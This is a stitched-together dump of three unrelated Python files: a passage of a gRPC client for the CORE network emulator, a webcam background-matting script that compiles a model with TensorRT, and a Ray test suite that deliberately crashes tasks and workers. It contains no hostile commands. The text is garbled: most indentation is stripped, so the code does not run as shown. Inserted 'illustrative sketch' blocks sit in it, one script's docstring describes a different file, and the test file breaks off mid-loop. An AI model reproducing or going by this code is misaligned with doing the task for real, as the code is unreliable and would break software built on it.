:param config: mobility configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
mobility_config = MobilityConfig(node_id=node_id, config=config)
request = SetMobilityConfigRequest(
session_id=session_id, mobility_config=mobility_config
)
return self.stub.SetMobilityConfig(request)
def mobility_action(
self, session_id: int, node_id: int, action: ServiceAction
) -> MobilityActionResponse:
"""
Send a mobility action for a node.
:param session_id: session id
:param node_id: node id
:param action: action to take
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = MobilityActionRequest(
session_id=session_id, node_id=node_id, action=action
)
return self.stub.MobilityAction(request)
def get_services(self) -> GetServicesResponse:
"""
Get all currently loaded services.
:return: response with a list of services
"""
request = GetServicesRequest()
return self.stub.GetServices(request)
def get_service_defaults(self, session_id: int) -> GetServiceDefaultsResponse:
"""
Get default services for different default node models.
:param session_id: session id
:return: response with a dict of node model to a list of services
:raises grpc.RpcError: when session doesn't exist
"""
request = GetServiceDefaultsRequest(session_id=session_id)
return self.stub.GetServiceDefaults(request)
def set_service_defaults(
self, session_id: int, service_defaults: Dict[str, List[str]]
) -> SetServiceDefaultsResponse:
"""
Set default services for node models.
:param session_id: session id
:param service_defaults: node models to lists of services
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
defaults = []
for node_type in service_defaults:
services = service_defaults[node_type]
default = ServiceDefaults(node_type=node_type, services=services)
defaults.append(default)
request = SetServiceDefaultsRequest(session_id=session_id, defaults=defaults)
return self.stub.SetServiceDefaults(request)
def get_node_service_configs(
self, session_id: int
) -> GetNodeServiceConfigsResponse:
"""
Get service data for a node.
:param session_id: session id
:return: response with all node service configs
:raises grpc.RpcError: when session doesn't exist
"""
request = GetNodeServiceConfigsRequest(session_id=session_id)
return self.stub.GetNodeServiceConfigs(request)
def get_node_service(
self, session_id: int, node_id: int, service: str
) -> GetNodeServiceResponse:
"""
Get service data for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:return: response with node service data
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeServiceRequest(
session_id=session_id, node_id=node_id, service=service
)
return self.stub.GetNodeService(request)
def get_node_service_file(
self, session_id: int, node_id: int, service: str, file_name: str
) -> GetNodeServiceFileResponse:
"""
Get a service file for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param file_name: file name to get data for
:return: response with file data
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name
)
return self.stub.GetNodeServiceFile(request)
def set_node_service(
self,
session_id: int,
node_id: int,
service: str,
files: List[str] = None,
directories: List[str] = None,
startup: List[str] = None,
validate: List[str] = None,
shutdown: List[str] = None,
) -> SetNodeServiceResponse:
"""
Set service data for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param files: service files
:param directories: service directories
:param startup: startup commands
:param validate: validation commands
:param shutdown: shutdown commands
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
config = ServiceConfig(
node_id=node_id,
service=service,
files=files,
directories=directories,
startup=startup,
validate=validate,
shutdown=shutdown,
)
request = SetNodeServiceRequest(session_id=session_id, config=config)
return self.stub.SetNodeService(request)
def set_node_service_file(
self, session_id: int, node_id: int, service: str, file_name: str, data: str
) -> SetNodeServiceFileResponse:
"""
Set a service file for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param file_name: file name to save
:param data: data to save for file
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
config = ServiceFileConfig(
node_id=node_id, service=service, file=file_name, data=data
)
request = SetNodeServiceFileRequest(session_id=session_id, config=config)
return self.stub.SetNodeServiceFile(request)
def service_action(
self, session_id: int, node_id: int, service: str, action: ServiceAction
) -> ServiceActionResponse:
"""
Send an action to a service for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param action: action for service (start, stop, restart,
validate)
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = ServiceActionRequest(
session_id=session_id, node_id=node_id, service=service, action=action
)
return self.stub.ServiceAction(request)
def get_wlan_configs(self, session_id: int) -> GetWlanConfigsResponse:
"""
Get all wlan configurations.
:param session_id: session id
:return: response with a dict of node ids to wlan configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetWlanConfigsRequest(session_id=session_id)
return self.stub.GetWlanConfigs(request)
def get_wlan_config(self, session_id: int, node_id: int) -> GetWlanConfigResponse:
"""
Get wlan configuration for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetWlanConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetWlanConfig(request)
def set_wlan_config(
self, session_id: int, node_id: int, config: Dict[str, str]
) -> SetWlanConfigResponse:
"""
Set wlan configuration for a node.
:param session_id: session id
:param node_id: node id
:param config: wlan configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
wlan_config = WlanConfig(node_id=node_id, config=config)
request = SetWlanConfigRequest(session_id=session_id, wlan_config=wlan_config)
return self.stub.SetWlanConfig(request)
def get_emane_config(self, session_id: int) -> GetEmaneConfigResponse:
"""
Get session emane configuration.
:param session_id: session id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneConfigRequest(session_id=session_id)
return self.stub.GetEmaneConfig(request)
def set_emane_config(
self, session_id: int, config: Dict[str, str]
) -> SetEmaneConfigResponse:
"""
Set session emane configuration.
:param session_id: session id
:param config: emane configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = SetEmaneConfigRequest(session_id=session_id, config=config)
return self.stub.SetEmaneConfig(request)
def get_emane_models(self, session_id: int) -> GetEmaneModelsResponse:
"""
Get session emane models.
:param session_id: session id
:return: response with a list of emane models
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelsRequest(session_id=session_id)
return self.stub.GetEmaneModels(request)
def get_emane_model_config(
self, session_id: int, node_id: int, model: str, interface_id: int = -1
) -> GetEmaneModelConfigResponse:
"""
Get emane model configuration for a node or a node's interface.
:param session_id: session id
:param node_id: node id
:param model: emane model name
:param interface_id: node interface id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, interface=interface_id
)
return self.stub.GetEmaneModelConfig(request)
def set_emane_model_config(
self,
session_id: int,
node_id: int,
model: str,
config: Dict[str, str] = None,
interface_id: int = -1,
) -> SetEmaneModelConfigResponse:
"""
Set emane model configuration for a node or a node's interface.
:param session_id: session id
:param node_id: node id
:param model: emane model name
:param config: emane model configuration
:param interface_id: node interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
model_config = EmaneModelConfig(
node_id=node_id, model=model, config=config, interface_id=interface_id
)
request = SetEmaneModelConfigRequest(
session_id=session_id, emane_model_config=model_config
)
return self.stub.SetEmaneModelConfig(request)
def get_emane_model_configs(self, session_id: int) -> GetEmaneModelConfigsResponse:
"""
Get all EMANE model configurations for a session.
:param session_id: session to get emane model configs
:return: response with a dictionary of node/interface ids to configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelConfigsRequest(session_id=session_id)
return self.stub.GetEmaneModelConfigs(request)
    def save_xml(self, session_id: int, file_path: str) -> None:
"""
Save the current scenario to an XML file.
:param session_id: session to save xml file for
:param file_path: local path to save scenario XML file to
:return: nothing
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SaveXmlRequest(session_id=session_id)
response = self.stub.SaveXml(request)
with open(file_path, "w") as xml_file:
xml_file.write(response.data)
def open_xml(self, file_path: str, start: bool = False) -> core_pb2.OpenXmlResponse:
"""
Load a local scenario XML file to open as a new session.
:param file_path: path of scenario XML file
:param start: True to start session, False otherwise
:return: response with opened session id
"""
with open(file_path, "r") as xml_file:
data = xml_file.read()
request = core_pb2.OpenXmlRequest(data=data, start=start, file=file_path)
return self.stub.OpenXml(request)
def emane_link(
self, session_id: int, nem_one: int, nem_two: int, linked: bool
) -> EmaneLinkResponse:
"""
Helps broadcast wireless link/unlink between EMANE nodes.
:param session_id: session to emane link
:param nem_one: first nem for emane link
:param nem_two: second nem for emane link
:param linked: True to link, False to unlink
:return: get emane link response
:raises grpc.RpcError: when session or nodes related to nems do not exist
"""
request = EmaneLinkRequest(
session_id=session_id, nem_one=nem_one, nem_two=nem_two, linked=linked
)
return self.stub.EmaneLink(request)
def get_interfaces(self) -> core_pb2.GetInterfacesResponse:
"""
Retrieves a list of interfaces available on the host machine that are not
a part of a CORE session.
:return: get interfaces response
"""
request = core_pb2.GetInterfacesRequest()
return self.stub.GetInterfaces(request)
def get_config_services(self) -> GetConfigServicesResponse:
"""
Retrieve all known config services.
:return: get config services response
"""
request = GetConfigServicesRequest()
return self.stub.GetConfigServices(request)
def get_config_service_defaults(
self, name: str
) -> GetConfigServiceDefaultsResponse:
"""
Retrieves config service default values.
:param name: name of service to get defaults for
:return: get config service defaults
"""
request = GetConfigServiceDefaultsRequest(name=name)
return self.stub.GetConfigServiceDefaults(request)
def get_node_config_service_configs(
self, session_id: int
) -> GetNodeConfigServiceConfigsResponse:
"""
Retrieves all node config service configurations for a session.
:param session_id: session to get config service configurations for
:return: get node config service configs response
:raises grpc.RpcError: when session doesn't exist
"""
request = GetNodeConfigServiceConfigsRequest(session_id=session_id)
return self.stub.GetNodeConfigServiceConfigs(request)
def get_node_config_service(
self, session_id: int, node_id: int, name: str
) -> GetNodeConfigServiceResponse:
"""
Retrieves information for a specific config service on a node.
:param session_id: session node belongs to
:param node_id: id of node to get service information from
:param name: name of service
:return: get node config service response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeConfigServiceRequest(
session_id=session_id, node_id=node_id, name=name
)
return self.stub.GetNodeConfigService(request)
def get_node_config_services(
self, session_id: int, node_id: int
) -> GetNodeConfigServicesResponse:
"""
Retrieves the config services currently assigned to a node.
:param session_id: session node belongs to
:param node_id: id of node to get config services for
:return: get node config services response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeConfigServicesRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeConfigServices(request)
def set_node_config_service(
self, session_id: int, node_id: int, name: str, config: Dict[str, str]
) -> SetNodeConfigServiceResponse:
"""
Assigns a config service to a node with the provided configuration.
:param session_id: session node belongs to
:param node_id: id of node to assign config service to
:param name: name of service
:param config: service configuration
:return: set node config service response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = SetNodeConfigServiceRequest(
session_id=session_id, node_id=node_id, name=name, config=config
)
return self.stub.SetNodeConfigService(request)
def get_emane_event_channel(self, session_id: int) -> GetEmaneEventChannelResponse:
"""
Retrieves the current emane event channel being used for a session.
:param session_id: session to get emane event channel for
:return: emane event channel response
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneEventChannelRequest(session_id=session_id)
return self.stub.GetEmaneEventChannel(request)
def execute_script(self, script: str) -> ExecuteScriptResponse:
"""
Executes a python script given context of the current CoreEmu object.
:param script: script to execute
:return: execute script response
"""
request = ExecuteScriptRequest(script=script)
return self.stub.ExecuteScript(request)
def wlan_link(
self, session_id: int, wlan: int, node_one: int, node_two: int, linked: bool
) -> WlanLinkResponse:
"""
Links/unlinks nodes on the same WLAN.
:param session_id: session id containing wlan and nodes
:param wlan: wlan nodes must belong to
:param node_one: first node of pair to link/unlink
        :param node_two: second node of pair to link/unlink
:param linked: True to link, False to unlink
:return: wlan link response
:raises grpc.RpcError: when session or one of the nodes do not exist
"""
request = WlanLinkRequest(
session_id=session_id,
wlan=wlan,
node_one=node_one,
node_two=node_two,
linked=linked,
)
return self.stub.WlanLink(request)
def emane_pathlosses(
self, pathloss_iterator: Iterable[EmanePathlossesRequest]
) -> EmanePathlossesResponse:
"""
Stream EMANE pathloss events.
:param pathloss_iterator: iterator for sending emane pathloss events
:return: emane pathloss response
:raises grpc.RpcError: when a pathloss event session or one of the nodes do not
exist
"""
return self.stub.EmanePathlosses(pathloss_iterator)
def connect(self) -> None:
"""
Open connection to server, must be closed manually.
:return: nothing
"""
self.channel = grpc.insecure_channel(
self.address, options=[("grpc.enable_http_proxy", self.proxy)]
)
self.stub = core_pb2_grpc.CoreApiStub(self.channel)
def close(self) -> None:
"""
Close currently opened server channel connection.
:return: nothing
"""
if self.channel:
self.channel.close()
self.channel = None
@contextmanager
def context_connect(self) -> Generator:
"""
Makes a context manager based connection to the server, will close after
context ends.
:return: nothing
"""
try:
self.connect()
yield
finally:
self.close()
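if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): connects to a local core-daemon, creates a
    # session and starts it with two default nodes linked together, then deletes the session. The node
    # positions, the ip4 prefix and the assumption that a server listens on localhost:50051 are placeholders.
    interface_helper = InterfaceHelper(ip4_prefix="10.0.0.0/24")
    core = CoreGrpcClient()
    with core.context_connect():
        session_id = core.create_session().session_id
        node_one = core_pb2.Node(id=1, position=core_pb2.Position(x=100, y=100))
        node_two = core_pb2.Node(id=2, position=core_pb2.Position(x=300, y=100))
        link = core_pb2.Link(node_one_id=1, node_two_id=2, type=core_pb2.LinkType.WIRED,
                             interface_one=interface_helper.create_interface(1, 0),
                             interface_two=interface_helper.create_interface(2, 0))
        core.start_session(session_id, [node_one, node_two], [link])
        print(core.get_session(session_id))
        core.delete_session(session_id)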
|
convert_tensorrt.py
|
"""
Inference on webcams: Use a model on webcam input.
Once launched, the script is in background collection mode.
Press B to toggle between background capture mode and matting mode. The frame shown when B is pressed is used as background for matting.
Press Q to exit.
Example:
python inference_webcam.py \
--model-type mattingrefine \
--model-backbone resnet50 \
--model-checkpoint "PATH_TO_CHECKPOINT" \
--resolution 1280 720
"""
import argparse, os, shutil, time
import cv2
import torch
import numpy as np
from torch import nn
from torch.utils.data import DataLoader
from torchvision.transforms import Compose, ToTensor, Resize
from torchvision.transforms.functional import to_pil_image
from threading import Thread, Lock
from tqdm import tqdm
from PIL import Image
from dataset import VideoDataset
from model import MattingBase, MattingRefine
try:
from jetcam.csi_camera import CSICamera
except ImportError:
CSICamera = None
import trtorch
# try:
# from torch2trt import torch2trt
# except ImportError:
# torch2trt = None
# --------------- Arguments ---------------
parser = argparse.ArgumentParser(description="Inference from web-cam")
parser.add_argument(
"--model-type",
type=str,
required=True,
choices=["mattingbase", "mattingrefine", "jit"],
)
parser.add_argument(
"--model-backbone",
type=str,
required=True,
choices=["resnet101", "resnet50", "mobilenetv2"],
)
parser.add_argument("--model-backbone-scale", type=float, default=0.25)
parser.add_argument("--model-checkpoint", type=str, required=True)
parser.add_argument(
"--model-refine-mode",
type=str,
default="sampling",
choices=["full", "sampling", "thresholding"],
)
parser.add_argument("--model-refine-sample-pixels", type=int, default=80_000)
parser.add_argument("--model-refine-threshold", type=float, default=0.7)
parser.add_argument("--num-threads", type=int, default=4)
parser.add_argument(
"--background", type=str, choices=["white", "green", "blue", "red"], default="white"
)
parser.add_argument("--fake-cam", action="store_true")
parser.add_argument("--hide-fps", action="store_true")
parser.add_argument(
"--resolution", type=int, nargs=2, metavar=("width", "height"), default=(1280, 720)
)
args = parser.parse_args()
# ----------- Utility classes -------------
# A wrapper that reads data from cv2.VideoCapture in its own thread to optimize.
# Use .read() in a tight loop to get the newest frame
class Camera:
def __init__(self, device_id=0, width=1280, height=720):
self.capture = cv2.VideoCapture(device_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
# self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.success_reading, self.frame = self.capture.read()
self.read_lock = Lock()
self.thread = Thread(target=self.__update, args=())
self.thread.daemon = True
self.thread.start()
def __update(self):
while self.success_reading:
grabbed, frame = self.capture.read()
with self.read_lock:
self.success_reading = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
return frame
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
# An FPS tracker that computes an exponentially weighted moving average of the FPS
class FPSTracker:
def __init__(self, ratio=0.5):
self._last_tick = None
self._avg_fps = None
self.ratio = ratio
def tick(self):
if self._last_tick is None:
self._last_tick = time.time()
return None
t_new = time.time()
fps_sample = 1.0 / (t_new - self._last_tick)
self._avg_fps = (
self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps
if self._avg_fps is not None
else fps_sample
)
self._last_tick = t_new
return self.get()
def get(self):
return self._avg_fps
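def _example_fps_tracker(num_frames=10):
    # Illustrative sketch (not part of the original script): ticks the tracker once per simulated frame
    # and returns the smoothed FPS estimate. The 10 ms sleep stands in for real frame processing.
    tracker = FPSTracker()
    fps = None
    for _ in range(num_frames):
        time.sleep(0.01)
        fps = tracker.tick()
    return fps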
# Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity.
# It also tracks FPS and optionally overlays info onto the stream.
class Displayer:
def __init__(self, title, width=None, height=None, show_info=True):
self.title, self.width, self.height = title, width, height
self.show_info = show_info
self.fps_tracker = FPSTracker()
self.fake_cam = None
cv2.namedWindow(self.title, cv2.WINDOW_NORMAL)
if width is not None and height is not None:
cv2.resizeWindow(self.title, width, height)
# Update the currently showing frame and return key press char code
def step(self, image):
fps_estimate = self.fps_tracker.tick()
if self.show_info and fps_estimate is not None:
message = f"{int(fps_estimate)} fps | {self.width}x{self.height}"
cv2.putText(
image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0)
)
if self.fake_cam is not None:
image_web = np.ascontiguousarray(image, dtype=np.uint8)
image_web = cv2.cvtColor(image_web, cv2.COLOR_RGB2BGR)
self.fake_cam.schedule_frame(image_web)
cv2.imshow(self.title, image)
return cv2.waitKey(1) & 0xFF
if "fp16" in args.model_checkpoint and not args.model_type == "jit":
precision = torch.float16
else:
precision = torch.float32
# --------------- Main ---------------
torch.set_num_threads(args.num_threads)
device = "cuda" if torch.cuda.is_available() else "cpu"
print(f"Using {args.num_threads} threads")
print(f"Using {precision} precision")
print(f"Using {device} device")
# Load model
if args.model_type == "mattingbase":
model = MattingBase(args.model_backbone)
if args.model_type == "mattingrefine":
model = MattingRefine(
args.model_backbone,
args.model_backbone_scale,
args.model_refine_mode,
args.model_refine_sample_pixels,
args.model_refine_threshold,
)
if args.model_type == "jit":
model = torch.jit.load(args.model_checkpoint)
else:
model.load_state_dict(
torch.load(args.model_checkpoint, map_location=device), strict=False
)
model = model.eval().to(device=device, dtype=precision)
width, height = args.resolution
if CSICamera is None:
cam = Camera(width=width, height=height)
else:
cam = CSICamera(
width=width,
height=height,
capture_width=1080,
capture_height=720,
capture_fps=30, # reduce to reduce lag
)
# cam.running = True
dsp = Displayer("MattingV2", cam.width, cam.height, show_info=(not args.hide_fps))
def cv2_frame_to_cuda(frame):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return (
ToTensor()(Image.fromarray(frame))
.unsqueeze_(0)
.to(device=device, dtype=precision)
)
# Convert to tensorRT
# not all operations supported :/
if trtorch is not None:
with torch.no_grad():
x = cv2_frame_to_cuda(cam.read())
print(x.shape)
shape = list(x.shape)
compile_settings = {
"input_shapes": [shape, shape],
# "input_shapes": [
# # [shape, shape]
# # {
# # "min": [1, 3, 224, 224],
# # "opt": [1, 3, 512, 512],
# # "max": [1, 3, 1024, 1024]
# # }, # For static size [1, 3, 224, 224]
# ],
"op_precision": torch.half, # Run with FP16
"num_min_timing_iters": 2, # Default: 2
"num_avg_timing_iters": 1, # Default: 1
"max_batch_size": 1, # Maximum batch size (must be >= 1 to be set, 0 means not set)
}
# script_model = torch.jit.script(model)
traced_model = torch.jit.trace(model, [x, x])
trt_ts_module = trtorch.compile(traced_model, compile_settings)
x = x.half()
result = trt_ts_module(x, x)
torch.jit.save(trt_ts_module, "trt_torchscript_module_fp16.ts")
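# Illustrative sketch (not part of the original script): reload the saved module and run it once on the
# same example frame, to check that the compiled TorchScript can be used without the original model
# definition (the `import trtorch` above is assumed to still be needed to register the TensorRT ops).
reloaded = torch.jit.load("trt_torchscript_module_fp16.ts")
with torch.no_grad():
    _ = reloaded(x, x)
print("Reloaded TensorRT TorchScript module ran on one frame")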
|
failure_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import json
import os
import ray
import sys
import tempfile
import threading
import time
import ray.ray_constants as ray_constants
from ray.utils import _random_string
import pytest
from ray.test.cluster_utils import Cluster
def relevant_errors(error_type):
return [info for info in ray.error_info() if info["type"] == error_type]
def wait_for_errors(error_type, num_errors, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(relevant_errors(error_type)) >= num_errors:
return
time.sleep(0.1)
    raise Exception("Timed out waiting for errors.")
@pytest.fixture
def ray_start_regular():
# Start the Ray processes.
ray.init(num_cpus=2)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
return module.temporary_python_file()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_regular):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.error_info()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
    # Wait for the error from the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_local_scheduler = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
f.remote()
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(Exception):
ray.get(obj)
with pytest.raises(Exception):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(ray.error_info()) == 0, (
"Should not have propogated an error - {}".format(ray.error_info()))
@pytest.fixture
def ray_start_object_store_memory():
# Start the Ray processes.
store_size = 10**6
ray.init(num_cpus=1, object_store_memory=store_size)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.mark.skip("This test does not work yet.")
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
